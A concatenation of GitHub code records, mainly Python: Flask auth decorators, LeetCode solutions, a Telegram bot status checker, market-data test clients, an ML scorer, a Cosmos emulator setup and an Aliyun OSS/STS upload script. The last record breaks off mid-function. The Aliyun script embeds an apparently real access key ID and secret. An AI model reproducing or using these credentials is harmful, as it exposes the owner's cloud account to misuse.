= name\n if route == 'user' and value == user.uuid:\n updates['user'] = user\n elif route in routing:\n try:\n filter_by = {}\n filter_by[field] = value\n updates[route] = routing[route].query \\\n .filter_by(**filter_by) \\\n .one()\n except (NoResultFound, MultipleResultsFound):\n not_found()\n kwargs.update(updates)\n\n # if requested user is not logged in, he needs to be\n # user with admin role or will be sent 403\n requested_user = kwargs.get('user')\n if requested_user is not None:\n if request.user.uuid != requested_user.uuid:\n if request.user.role != User.ROLE_ADMIN:\n forbidden()\n\n return fn(*args, **kwargs)\n return update_wrapper(wrapped_function, fn)\n return decorator\n\n\ndef auth_external():\n \"\"\"\n Apply json validation on payload or function arguments\n \"\"\"\n def decorator(fn):\n def wrapped_function(*args, **kwargs):\n # get authorization content\n token = request.headers.get('Authorization')\n if token is None:\n abort(401)\n\n # find application by authorization token\n application = Application.get_one(token=token)\n if application is None:\n abort(401)\n\n # pass application to endpoint handler\n kwargs['application'] = application\n\n return fn(*args, **kwargs)\n return update_wrapper(wrapped_function, fn)\n return decorator\n","repo_name":"VojtechBartos/smsgw","sub_path":"smsgw/resources/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"72878975208","text":"# link : https://leetcode.com/problems/two-sum-ii-input-array-is-sorted/description/\n# author : Mohamed Ibrahim\n\n\nclass Solution:\n def twoSum(self, numbers: List[int], target: int) -> List[int]:\n i,j = 0,len(numbers)-1\n while i < j:\n if numbers[i]+numbers[j] == target : return [i+1,j+1]\n if numbers[i]+numbers[j] > target:j-=1\n else:i+=1\n \n\n \n# Using Recursion\n\nclass Solution:\n def twoSum(self, numbers: List[int], target: int) -> List[int]:\n return self.resc(numbers,0,len(numbers)-1,target)\n def resc(self,numbers,i,j,t):\n sum = numbers[i]+numbers[j]\n if sum == t: return [i+1,j+1]\n elif sum > t:\n return self.resc(numbers,i,j-1,t)\n else:\n return self.resc(numbers,i+1,j,t) \n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"LeetCode/Two Sum II.py","file_name":"Two Sum II.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"25182751013","text":"import os\nimport re\nimport pytz\nimport asyncio\nimport datetime\n\nfrom pyrogram import Client, filters\nfrom pyrogram.errors import FloodWait\n\n\napp = Client(\n name = \"devbotz\",\n api_id = int(os.environ[\"API_ID\"]),\n api_hash = os.environ[\"API_HASH\"],\n session_string = os.environ[\"SESSION_STRING\"]\n)\n\nTIME_ZONE = os.environ[\"TIME_ZONE\"]\nBOT_LIST = [i.strip() for i in os.environ.get(\"BOT_LIST\").split(' ')]\nCHANNEL_ID = int(os.environ[\"CHANNEL_ID\"]) #CHANNEL_ID is for group/channel where checker will update the status.\nMESSAGE_ID = int(os.environ[\"MESSAGE_ID\"])\nBOT_ADMIN_IDS = [int(i.strip()) for i in os.environ.get(\"BOT_ADMIN_IDS\").split(' ')]\nGRP_ID = os.environ.get(\"GRP_ID\") #GRP_ID is for logs group where checker will send warnings of offline bots.\n\nasync def main_devchecker():\n async with app:\n while True:\n print(\"Checking...\")\n xxx_teletips = f\"**🏷 ᴡᴇʟᴄᴏᴍᴇ ᴛᴏ {(await app.get_chat(CHANNEL_ID)).title} ɪɴғᴏʀᴍᴀᴛɪᴏɴ ᴄʜᴀɴɴᴇʟ**\\n\\n 📈 | **ʀᴇᴀʟ ᴛɪᴍᴇ ʙᴏᴛ's sᴛᴀᴛᴜs 🍂**\"\n for bot in BOT_LIST:\n await asyncio.sleep(7)\n try:\n bot_info = await app.get_users(bot)\n except Exception:\n bot_info = bot\n\n try:\n yyy_teletips = await app.send_message(bot, \"/start\")\n aaa = yyy_teletips.id\n await asyncio.sleep(15)\n zzz_teletips = app.get_chat_history(bot, limit = 1)\n async for ccc in zzz_teletips:\n bbb = ccc.id\n if aaa == bbb:\n xxx_teletips += f\"\\n\\n╭⎋ **[{bot_info.first_name}](tg://user?id={bot_info.id})**\\n╰⊚ **sᴛᴀᴛᴜs: ᴏғғʟɪɴᴇ ❄**\"\n for bot_admin_id in BOT_ADMIN_IDS:\n try:\n await app.send_message(int(GRP_ID), f\"**ʙsᴅᴋ ᴋʏᴀ ᴋᴀʀ ʀᴀʜᴀ ʜᴀɪ 😡\\n[{bot_info.first_name}](tg://user?id={bot_info.id}) ᴏғғ ʜᴀɪ. ᴀᴄᴄʜᴀ ʜᴜᴀ ᴅᴇᴋʜ ʟɪʏᴀ ᴍᴀɪɴᴇ.**\")\n except Exception:...\n await app.read_chat_history(bot)\n else:\n xxx_teletips += f\"\\n\\n╭⎋ **[{bot_info.first_name}](tg://user?id={bot_info.id})**\\n╰⊚ **sᴛᴀᴛᴜs: ᴏɴʟɪɴᴇ ✨**\"\n await app.read_chat_history(bot)\n except FloodWait as e:\n ttm = re.findall(\"\\d{0,5}\", str(e))\n await asyncio.sleep(int(ttm))\n time = datetime.datetime.now(pytz.timezone(f\"{TIME_ZONE}\"))\n last_update = time.strftime(f\"%d %b %Y at %I:%M %p\")\n xxx_teletips += f\"\\n\\n✔️ ʟᴀsᴛ ᴄʜᴇᴄᴋᴇᴅ ᴏɴ:\\n**ᴅᴀᴛᴇ & ᴛɪᴍᴇ: {last_update}**\\n**ᴛɪᴍᴇ ᴢᴏɴᴇ: ({TIME_ZONE})**\\n\\n♻️ ʀᴇғʀᴇsʜᴇs ᴀᴜᴛᴏᴍᴀᴛɪᴄᴀʟʟʏ ᴡɪᴛʜɪɴ 10 ᴍɪɴᴜᴛᴇs.\\n\\n**๏ ᴘᴏᴡᴇʀᴇᴅ ʙʏ @{(await app.get_chat(CHANNEL_ID)).username} ๏**\"\n await app.edit_message_text(int(CHANNEL_ID), MESSAGE_ID, xxx_teletips)\n print(f\"Last checked on: {last_update}\") \n await asyncio.sleep(600)\n \napp.run(main_devchecker())\n\n","repo_name":"Devarora-0981/Status-Checker","sub_path":"dev_status_checker.py","file_name":"dev_status_checker.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"18323719113","text":"# -*- coding: utf-8 -*-\n# !/usr/bin/python\n# @Author: WX\n# @Create Time: 2020/5/16\n# @Software: PyCharm\n\n\nfrom websocket_py3.ws_api.subscribe_server_api import *\nfrom common.common_method import *\n\n\nclass SimpleAppFunc(object):\n def __init__(self, ws_url):\n self.url = ws_url\n self.common = Common()\n self.loop = self.common.getNewLoop()\n self.api = SubscribeApi(self.url, self.loop)\n\n def connect(self):\n try:\n self.loop.run_until_complete(self.api.client.ws_connect())\n except Exception as e:\n self.common.logger.debug('app connect error:\\n{}'.format(e))\n\n def disconnect(self):\n try:\n self.api.client.disconnect()\n except Exception as e:\n self.common.logger.debug('app disconnect error:\\n{}'.format(e))\n\n def login(self):\n try:\n self.loop.run_until_complete(self.api.LoginReq('app_login', int(time.time() * 1000)))\n asyncio.run_coroutine_threadsafe(self.api.hearbeat_job(), self.loop)\n except Exception as e:\n self.common.logger.debug('app login error:\\n{}'.format(e))\n\n def loginout(self):\n try:\n self.loop.run_until_complete(self.api.LogoutReq(int(time.time() * 1000)))\n except Exception as e:\n self.common.logger.debug('app loginout error:\\n{}'.format(e))\n\n def sub_market(self):\n try:\n sub_type = SubscribeMsgType.SUB_WITH_MARKET\n base_info = [{'exchange': 'HKFE'}]\n start_time_stamp = int(time.time() * 1000) # 毫秒时间戳\n quote_rsp = self.loop.run_until_complete(\n future=self.api.SubsQutoMsgReqApi(sub_type=sub_type, child_type=None, base_info=base_info,\n start_time_stamp=start_time_stamp))\n first_rsp_list = quote_rsp['first_rsp_list']\n assert (self.common.searchDicKV(first_rsp_list[0], 'retCode') == 'SUCCESS')\n\n except Exception as e:\n self.common.logger.debug('app sub_market error:\\n{}'.format(e))\n\n def unsub_market(self):\n try:\n sub_type = SubscribeMsgType.SUB_WITH_MARKET\n base_info = [{'exchange': 'HKFE'}]\n start_time_stamp = int(time.time() * 1000) # 毫秒时间戳\n quote_rsp = self.loop.run_until_complete(\n future=self.api.UnSubsQutoMsgReqApi(unsub_type=sub_type, unchild_type=None, unbase_info=base_info,\n start_time_stamp=start_time_stamp, recv_num=10000))\n except Exception as e:\n self.common.logger.debug('app unsub_market error:\\n{}'.format(e))\n\n def recv_forever(self):\n while True:\n self.loop.run_until_complete(self.api.AppQuoteAllApi(recv_num=100))\n\n def sub_product(self):\n try:\n sub_type = SubscribeMsgType.SUB_WITH_PRODUCT\n self.product_code = 'HHI'\n base_info = [{'exchange': 'HKFE', 'product_code': self.product_code}]\n start_time_stamp = int(time.time() * 1000) # 毫秒时间戳\n quote_rsp = self.loop.run_until_complete(\n future=self.api.SubsQutoMsgReqApi(sub_type=sub_type, child_type=None, base_info=base_info,\n start_time_stamp=start_time_stamp))\n except Exception as e:\n self.common.logger.debug('app sub_product error:\\n{}'.format(e))\n\n def unsub_product(self):\n try:\n sub_type = SubscribeMsgType.SUB_WITH_PRODUCT\n # self.product_code = 'HHI'\n base_info = [{'exchange': 'HKFE', 'product_code': self.product_code}]\n start_time_stamp = int(time.time() * 1000) # 毫秒时间戳\n quote_rsp = self.loop.run_until_complete(\n future=self.api.UnSubsQutoMsgReqApi(unsub_type=sub_type, unchild_type=None, unbase_info=base_info,\n start_time_stamp=start_time_stamp, recv_num=10000))\n except Exception as e:\n self.common.logger.debug('app unsub_product error:\\n{}'.format(e))\n\n def sub_instr(self):\n try:\n sub_type = SubscribeMsgType.SUB_WITH_INSTR\n self.code = 'HHI2005'\n base_info = [{'exchange': 'HKFE', 'code': self.code}]\n start_time_stamp = int(time.time() * 1000) # 毫秒时间戳\n quote_rsp = self.loop.run_until_complete(\n future=self.api.SubsQutoMsgReqApi(sub_type=sub_type, child_type=None, base_info=base_info,\n start_time_stamp=start_time_stamp))\n except Exception as e:\n self.common.logger.debug('app sub_instr error:\\n{}'.format(e))\n\n def unsub_instr(self):\n try:\n sub_type = SubscribeMsgType.SUB_WITH_INSTR\n base_info = [{'exchange': 'HKFE', 'code': self.code}]\n start_time_stamp = int(time.time() * 1000) # 毫秒时间戳\n quote_rsp = self.loop.run_until_complete(\n future=self.api.UnSubsQutoMsgReqApi(unsub_type=sub_type, unchild_type=None, unbase_info=base_info,\n start_time_stamp=start_time_stamp, recv_num=10000))\n except Exception as e:\n self.common.logger.debug('app unsub_instr error:\\n{}'.format(e))\n\n def listen_and_action(self):\n introduce_info = '''\n action == 1 : ws connect\n action == 2 : ws disconnect\n action == 3 : login\n action == 4 : loginout\n action == 5 : sub_market\n action == 6 : unsub_market\n action == a : recv_forever\n action == 7 : sub_product\n action == 8 : unsub_product\n action == 9 : sub_instr\n action == 0 : unsub_instr\n action == a : recv_forever\n action == q : exit\n '''\n self.common.logger.debug('Please input as below shows.{}'.format(introduce_info))\n board = KeyboardListen()\n board.start_listen()\n input_num = 0\n while True:\n if board.input_num > input_num:\n try:\n input_num = board.input_num\n # 因可能是右边小键盘数字,所以对应两个key值\n if board.key in ['1', '97']:\n self.common.logger.debug('action == 1 : ws connect')\n self.connect()\n elif board.key in ['2', '98']:\n self.common.logger.debug('action == 2 : ws disconnect')\n self.disconnect()\n elif board.key in ['3', '99']:\n self.common.logger.debug('action == 3 : login')\n self.login()\n elif board.key in ['4', '100']:\n self.common.logger.debug('action == 4 : loginout')\n self.loginout()\n elif board.key in ['5', '101', '65437']: # linux's little keyboard is 65437\n self.common.logger.debug('action == 5 : sub_market')\n self.sub_market()\n elif board.key in ['6', '102']:\n self.common.logger.debug('aaction == 6 : unsub_market')\n self.unsub_market()\n elif board.key in ['7', '103']:\n self.common.logger.debug('action == 7 : sub_product')\n self.sub_product()\n elif board.key in ['8', '104']:\n self.common.logger.debug('action == 8 : unsub_product')\n self.unsub_product()\n elif board.key in ['9', '105']:\n self.common.logger.debug('action == 9 : sub_instr')\n self.sub_instr()\n elif board.key in ['0', '96']:\n self.common.logger.debug('action == 0 : unsub_instr')\n self.unsub_instr()\n elif board.key == 'a':\n self.common.logger.debug('action == a : recv_forever')\n self.recv_forever()\n elif board.key == 'q':\n self.common.logger.debug('action == q : exit')\n break\n else:\n self.common.logger.debug('Input unkonwn! please input as below shows. \\n{}'.format(introduce_info))\n except Exception as e:\n self.common.logger.debug('app listen error:\\n', e)\n\n\nif __name__ == '__main__':\n pass","repo_name":"rage-vampire/Python","sub_path":"Code/marketTest/testcase/ws_testcase/tool/simple_app.py","file_name":"simple_app.py","file_ext":"py","file_size_in_byte":8610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32239616355","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 7 23:24:50 2022\r\n\r\n@author: mmd20\r\n\"\"\"\r\n\r\n\r\n\r\n#%%\r\n\r\ndef rotated_array_search(input_list, number):\r\n \"\"\"\r\n Find the index by searching in a rotated sorted array\r\n\r\n Args:\r\n input_list(array), number(int): Input array to search and the target\r\n Returns:\r\n int: Index or -1\r\n \"\"\"\r\n def binary_search_recursive(array, target, start_index, end_index):\r\n if start_index > end_index:\r\n return -1\r\n \r\n mid_index = (start_index + end_index) // 2\r\n mid_element = array[mid_index]\r\n \r\n if mid_element == target:\r\n return mid_index\r\n \r\n index_left_side = binary_search_recursive(array, target, start_index, mid_index - 1)\r\n index_right_side = binary_search_recursive(array, target, mid_index + 1, end_index)\r\n \r\n return max(index_left_side, index_right_side)\r\n\r\n start_index = 0\r\n end_index = len(input_list)-1 \r\n\r\n return binary_search_recursive(input_list, number, start_index, end_index)\r\n\r\n\r\ndef linear_search(input_list, number):\r\n for index, element in enumerate(input_list):\r\n if element == number:\r\n return index\r\n return -1\r\n\r\ndef test_function(test_case):\r\n input_list = test_case[0]\r\n number = test_case[1]\r\n if linear_search(input_list, number) == rotated_array_search(input_list, number):\r\n print(\"Pass\")\r\n else:\r\n print(\"Fail\")\r\n\r\ntest_function([[6, 7, 8, 9, 10, 1, 2, 3, 4], 6])\r\ntest_function([[6, 7, 8, 9, 10, 1, 2, 3, 4], 1])\r\ntest_function([[6, 7, 8, 1, 2, 3, 4], 8])\r\ntest_function([[6, 7, 8, 1, 2, 3, 4], 1])\r\ntest_function([[6, 7, 8, 1, 2, 3, 4], 10])\r\n\r\n\r\n","repo_name":"medetm0524/22Udacity_Nanodegree_DSA","sub_path":"3_Basic_Algorithms/Problem2_corrected.py","file_name":"Problem2_corrected.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5499101076","text":"import glob\nimport json\nimport os\nimport logging\nimport hydra\nimport torch\nimport tqdm\nfrom transformers import set_seed\nfrom accelerate import Accelerator\nfrom inferencer import Inferencer\nfrom src.utils.misc import save_json\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Scorer(Inferencer):\n\n def forward(self):\n if self.accelerator.is_main_process:\n dataloader = tqdm.tqdm(self.dataloader)\n else:\n dataloader = self.dataloader\n\n res = []\n for i, entry in enumerate(dataloader):\n metadata = entry.pop(\"metadata\")\n # fix position id error when using left padding, note that calling generate() doesn't affected by this,\n # but here we don't generate new tokens, so we have to fix it manually.\n position_ids = entry.attention_mask.long().cumsum(-1) - 1\n # replace -1 with 1, final position id is like [1, 1, ..., 1, 0, 1, 2, 3...],\n # where prior 1s is ignored in self-attention\n position_ids.masked_fill_(entry.attention_mask == 0, 1)\n\n with torch.no_grad():\n output = self.model(input_ids=entry.input_ids, attention_mask=entry.attention_mask,\n position_ids=position_ids)\n\n loss = self.nll_loss(entry=entry, output=output)\n\n for mdata, loss in zip(metadata, loss):\n mdata['score'] = loss\n\n if i == 0:\n logger.info(f\"Prompt: {metadata[0]['prompt']}\")\n logger.info(f\"Number of ICE: {len(metadata[0]['ice_prompts_list'])}\")\n\n res.extend(metadata)\n\n with open(f\"{self.output_file}tmp_{self.accelerator.device}.bin\", \"w\") as f:\n json.dump(res, f)\n\n def nll_loss(self, entry, output):\n shift_logits = output.logits[..., :-1, :].contiguous()\n shift_labels = entry.input_ids[..., 1:].contiguous()\n pad_token_id = self.dataset_reader.tokenizer.pad_token_id\n # entry.labels is already padded with pad_token_id, we further pad it to full length\n pad_mask = torch.nn.functional.pad(entry.labels,\n (shift_labels.shape[-1] - entry.labels.shape[-1], 0),\n value=pad_token_id)\n shift_labels.masked_fill_(pad_mask == pad_token_id, pad_token_id)\n\n loss_fct = torch.nn.CrossEntropyLoss(reduction='none', ignore_index=pad_token_id)\n loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)),\n shift_labels.view(-1)).view(shift_labels.size())\n answer_lens = (entry.labels != pad_token_id).sum(-1)\n loss = loss.sum(-1) / answer_lens\n loss = loss.cpu().detach().numpy().tolist()\n return loss\n\n def write_results(self):\n data = []\n for i, path in enumerate(glob.glob(f\"{self.output_file}tmp_*.bin\")):\n with open(path) as f:\n one_device = json.load(f)\n logger.info(f\"device: {i}, idx {[i['idx'] for i in one_device][:200]}...\")\n data.extend(one_device)\n\n # grouping results by uid\n example_dict = {}\n uid_field = 'idx'\n for entry in data:\n ctxs = {\"ctxs\": entry.pop('ctxs'), \"score\": entry.pop(\"score\")}\n if entry[uid_field] not in example_dict:\n entry['ctxs_candidates'] = [ctxs]\n example_dict[entry[uid_field]] = entry\n else:\n example_dict[entry[uid_field]]['ctxs_candidates'].append(ctxs)\n\n example_list = list(example_dict.values())\n mrr = 0\n num_candidates = len(example_list[0]['ctxs_candidates'])\n for entry in example_list:\n assert len(entry['ctxs_candidates']) == num_candidates, f\"{len(entry['ctxs_candidates'])}!={num_candidates}\"\n\n sorted_tuple = sorted(enumerate(entry['ctxs_candidates']), key=lambda x: x[1]['score'])\n entry['ctxs_candidates'] = [i[1]['ctxs'] for i in sorted_tuple]\n entry['ctxs'] = entry['ctxs_candidates'][0] # set top-scored cand to ctxs\n mrr += 1/([i[0] for i in sorted_tuple].index(0)+1)\n logger.info(f\"MRR: {mrr/len(example_list)}\")\n\n save_json(self.output_file, example_list)\n\n for path in glob.glob(f\"{self.output_file}tmp_*.bin\"):\n os.remove(path)\n\n\n@hydra.main(config_path=\"configs\", config_name=\"scorer\")\ndef main(cfg):\n logger.info(cfg)\n set_seed(43)\n accelerator = Accelerator()\n scorer = Scorer(cfg, accelerator)\n\n scorer.forward()\n accelerator.wait_for_everyone()\n if accelerator.is_main_process:\n scorer.write_results()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HKUNLP/icl-ceil","sub_path":"scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"36895137435","text":"#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*-\nimport subprocess\nimport sys\n\nfrom azure.cosmos import CosmosClient, PartitionKey, exceptions\nimport argparse\nimport urllib3\nfrom contextlib import contextmanager\n\n@contextmanager\ndef disable_ssl_warnings():\n import warnings\n import urllib3\n\n with warnings.catch_warnings():\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n yield None\n\n\"\"\"\nThe code below disables SSL Cert verification\nIt's only meant to be used with Cosmos Emulator\nCareful when using it with Azure Cosmos in production\n\"\"\" \n\ndef arg_parser():\n parser = argparse.ArgumentParser(\"cosmos-emulator-init\")\n parser.add_argument(\"--key\", \"-k\", required=True)\n parser.add_argument(\"--url\", \"-u\", required=True)\n parser.add_argument(\"--emulate\",\"-e\", default=False, action=\"store_true\")\n return parser\n\nargs = arg_parser().parse_args()\n\nKEY=args.key\nURL=args.url\nconnection_verify=not args.emulate\n\n# For local emulator\nif connection_verify is False:\n \n warning=\"BEAWARE: SSL verification and warnings are disabled for emulator\"\n print(warning,file=sys.stderr)\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nclient = CosmosClient(URL, credential=KEY, connection_verify=connection_verify)\n\n# Create LodeRunner db and container\n# CosmosDB values should be in sync with cosmos-create.sh\ndb_cont = {\"LodeRunnerDB\": \"LodeRunner\", \"LodeRunnerTestDB\": \"LodeRunner\"}\n\nfor db_name in db_cont:\n cont_name = db_cont[db_name]\n try:\n db = client.create_database(id=db_name)\n cont = db.create_container(\n id=cont_name, partition_key=PartitionKey(path=\"/partitionKey\")\n )\n print(f\"Created DB: {db_name}, Container: {cont_name}\")\n except exceptions.CosmosResourceExistsError:\n print(f'{db_name}/{cont_name} Already exists')\n except :\n raise\n","repo_name":"retaildevcrews/loderunner","sub_path":".devcontainer/cosmos-emulator/cosmos-emulator-init.py","file_name":"cosmos-emulator-init.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23824430236","text":"# -*- conding:utf-8 -*-\nimport json\nimport os\n\nimport oss2\n\nfrom aliyunsdkcore import client\nfrom aliyunsdkcore.profile import region_provider\nfrom aliyunsdksts.request.v20150401 import AssumeRoleRequest\n\n##定义一些变量\naccess_key_id = 'LTAI4FoMe6umpCSFQdEC9neg' \naccess_key_secret = 'jgEvtFOqIAGqKZve7zMvg8dJhSZv9J'\nbucket_name = 'fralychen'\nendpoint = 'oss-cn-hongkong.aliyuncs.com'\nsts_role_arn = 'acs:ram::1149877324567510:role/testrole'\n\n\n\n# 确认上面的参数都填写正确了\nfor param in (access_key_id, access_key_secret, bucket_name, endpoint, sts_role_arn):\n assert '<' not in param, '请设置参数:' + param\n\n#创建StsToken类方便用来存储临时用户信息\nclass StsInfo(object):\n \"\"\"AssumeRole返回的临时用户密钥\n :param str access_key_id: 临时用户的access key id\n :param str access_key_secret: 临时用户的access key secret\n :param int expiration: 过期时间,UNIX时间,自1970年1月1日UTC零点的秒数\n :param str security_token: 临时用户Token\n :param str request_id: 请求ID\n \"\"\"\n def __init__(self):\n self.access_key_id = ''\n self.access_key_secret = ''\n self.expiration = 0\n self.security_token = ''\n self.request_id = ''\n\n# 在控制台将 AliyunSTSAssumeRoleAccess 权限授权给子用户testRole,testRole操作AssumeRole接口,获取临时用户信息\ndef fetch_sts_info(access_key_id, access_key_secret, sts_role_arn):\n \"\"\"子用户角色扮演获取临时用户的密钥\n :param access_key_id: 子用户的 access key id\n :param access_key_secret: 子用户的 access key secret\n :param sts_role_arn: STS角色的Arn\n :return StsInfo 返回授权用户信息对象\n \"\"\"\n # 配置要访问的STS endpoint\n _REGIONID = 'cn-hongkong'\n _ENDPOINT = 'sts.cn-hongkong.aliyuncs.com'\n region_provider.add_endpoint('Sts', _REGIONID, _ENDPOINT)\n\n clt = client.AcsClient(access_key_id, access_key_secret, 'cn-hongkong')\n request = AssumeRoleRequest.AssumeRoleRequest()\n\n #request.set_accept_format('json')\n #指定角色ARN\n request.set_RoleArn(sts_role_arn)\n #设置会话名称,审计服务使用此名称区分调用者\n request.set_RoleSessionName('oss-python-sdk-example')\n #设置临时身份过期时间\n request.set_DurationSeconds(DurationSeconds)\n #发起请求,并得到response\n response = clt.do_action_with_exception(request)\n #格式化输出返回结果,将字符串结果转化为字典类型\n i = json.loads(oss2.to_unicode(response))\n #实例化StsInfo类并将临时用户信息存入对象\n global StsInfo\n StsInfo = StsInfo()\n StsInfo.access_key_id = i['Credentials']['AccessKeyId']\n StsInfo.access_key_secret = i['Credentials']['AccessKeySecret']\n StsInfo.security_token = i['Credentials']['SecurityToken']\n StsInfo.request_id = i['RequestId']\n StsInfo.expiration = oss2.utils.to_unixtime(i['Credentials']['Expiration'], '%Y-%m-%dT%H:%M:%SZ')\n \n\n #存储临时用户信息\n save_info()\n\n\n#使用sts授权的临时用户上传文件到bucket\ndef buck_put_object(sts_key_id, sts_key_secret, sts_secrity_token):\n \"\"\"上传字符串到资源\n :param sts_key_id: 临时身份的 access key id\n :param sts_key_secret: 临时身份的 access key secret\n :param sts_secrity_token: 临时身份的 secrity token\n :retu\n \"\"\" \n #实例化Bucket对象,并上传字符串\n auth = oss2.StsAuth(sts_key_id, sts_key_secret, sts_secrity_token)\n bucket = oss2.Bucket(auth,endpoint,'fralychen')\n result = bucket.put_object('fralychen','good good study day day up')\n\n#根据需求,可将临时身份信息存储到json文件中,等到临时身份过期后再重新请求,避免重复请求,用户泛滥\ndef save_info():\n #存储临时身份信息\n with open('StsInfo.json','w',encoding='utf-8') as f:\n data = {'sts_key_id':StsInfo.access_key_id,'sts_key_secret':StsInfo.access_key_secret,'sts_secrity_token':StsInfo.security_token,'sts_expire_date':StsInfo.expiration,'sts_reques_id':StsInfo.request_id}\n json.dump(data,f,ensure_ascii=False)\n f.close\n\n\ndef open_info():\n #读取临时身份信息\n with open('./StsInfo.json','r',encoding='utf-8') as f:\n global STSINFO\n STSINFO = json.load(f)\n return STSINFO\n\n\n#定义临时身份过期时间\nDurationSeconds = 900\n\ntry:\n open_info()\nexcept IOError:\n print(\"Error: 没有用户信息文件或文件读取失败\")\n print(\"初始化身份信息,临时身份信息存储中....\")\n fetch_sts_info(access_key_id, access_key_secret, sts_role_arn)\n print(\"临时身份信息存储完毕,当前目录下StsInfo.json\")\nelse:\n if oss2.utils.http_to_unixtime(oss2.utils.http_date()) + DurationSeconds > STSINFO[\"sts_expire_date\"]:\n buck_put_object(sts_key_id = STSINFO[\"sts_key_id\"],sts_key_secret = STSINFO[\"sts_key_secret\"], sts_secrity_token = STSINFO[\"sts_secrity_token\"])\n print(\"上传成功,good_lucky\")\n else:\n print(\"更新临时用户信息,请稍后\")\n fetch_sts_info(access_key_id, access_key_secret, sts_role_arn)\n buck_put_object(sts_key_id = STSINFO[\"sts_key_id\"],sts_key_secret = STSINFO[\"sts_key_secret\"], sts_secrity_token = STSINFO[\"sts_secrity_token\"])\n print(\"上传成功,good_lucky\")\n\n\n","repo_name":"PyMt/PyMt","sub_path":"STS.py","file_name":"STS.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26268566923","text":"import requests\nimport datetime\nimport traceback\n\ndef get_user_data(nip):\n \n url_id = f\"https://dane.biznes.gov.pl/api/mswf/v1/SearchAdvance?nip={nip}&pageNumber=0&pageSize=20\"\n\n res = requests.get(url_id)\n\n if res.status_code == 200:\n json_data = res.json()\n id = json_data['companyList'][0]['id']\n date = json_data['companyList'][0]['registerDate']\n else:\n traceback.print_exc() \n raise Exception(\"Error\")\n\n url_data = f\"https://dane.biznes.gov.pl/api/mswf/v1/GetCompanyDetails?id={id}\"\n\n res_data = requests.get(url_data)\n\n if res.status_code == 200:\n data = res_data.json()\n \n user_data = { \"Name\": data['basicData']['name'],\n \"Address\": f\"{data['addressData']['correspondenceAddress']['street']} {data['addressData']['correspondenceAddress']['buildingNumber']}, {data['addressData']['correspondenceAddress']['apartmentNumber']}\",\n \"City\": data['addressData']['correspondenceAddress']['city'] ,\n \"REGON\": data['basicData']['regon'],\n \"Date\": date }\n else:\n traceback.print_exc() \n raise Exception(\"Error\")\n\n # user_data = {\n # \"Name\": \"Artsiom Karatai\",\n # \"Address\": f\"Małopanewska 4, 8/1\",\n # \"City\": \"Wrocław\",\n # \"REGON\": \"521921834\",\n # \"Date\": \"2022-05-02\"\n # }\n\n return user_data\n\ndef get_gabinet_data(nip):\n\n today = datetime.date.today()\n\n date = today.strftime('%Y-%m-%d')\n \n url = f\"https://wl-api.mf.gov.pl/api/search/nip/{nip}?date={date}\"\n\n res = requests.get(url)\n\n if res.status_code == 200:\n data = res.json()\n if data['result']['subject'] == None:\n url_id = f\"https://dane.biznes.gov.pl/api/mswf/v1/SearchAdvance?nip={nip}&pageNumber=0&pageSize=20\"\n res = requests.get(url_id)\n\n if res.status_code == 200:\n json_data = res.json() \n source = json_data['companyList'][0]['source']\n if source == \"CEIDG\":\n id = json_data['companyList'][0]['id']\n date = json_data['companyList'][0]['registerDate']\n url_data = f\"https://dane.biznes.gov.pl/api/mswf/v1/GetCompanyDetails?id={id}\"\n\n res_data = requests.get(url_data)\n if res_data.status_code == 200:\n data = res_data.json()\n user_data = { \"Name\": data['basicData']['name'],\n \"NIP\": nip,\n \"REGON\": data['basicData']['regon'],\n \"Address\": f\"{data['addressData']['correspondenceAddress']['street']} {data['addressData']['correspondenceAddress']['buildingNumber']}, {data['addressData']['correspondenceAddress']['postcode']} {data['addressData']['correspondenceAddress']['city']}\",}\n return user_data\n elif source == \"KRS\":\n url_id = f\"https://dane.biznes.gov.pl/api/mswf/v1/SearchAdvance?nip={nip}&pageNumber=0&pageSize=20\"\n res = requests.get(url_id)\n if res.status_code == 200:\n krs = json_data['companyList'][0]['krs']\n url_data = f\"https://api-krs.ms.gov.pl/api/krs/OdpisAktualny/{krs}?rejestr=P&format=json\"\n res_data = requests.get(url_data)\n if res_data.status_code == 200:\n data = res_data.json()\n user_data = { \"Name\": data[\"odpis\"][\"dane\"][\"dzial1\"][\"danePodmiotu\"][\"nazwa\"],\n \"NIP\": nip,\n \"REGON\": data['odpis']['dane']['dzial1']['danePodmiotu']['identyfikatory']['regon'],\n \"Address\": f\"{data['odpis']['dane']['dzial1']['siedzibaIAdres']['adres']['ulica']} {data['odpis']['dane']['dzial1']['siedzibaIAdres']['adres']['nrDomu']}, {data['odpis']['dane']['dzial1']['siedzibaIAdres']['adres']['kodPocztowy']} {data['odpis']['dane']['dzial1']['siedzibaIAdres']['adres']['miejscowosc']}\"}\n return user_data\n else:\n traceback.print_exc() \n raise Exception(\"Error\")\n else:\n if data['result']['subject']['workingAddress'] != None:\n address = data['result']['subject']['workingAddress']\n else:\n address = data['result']['subject']['residenceAddress']\n 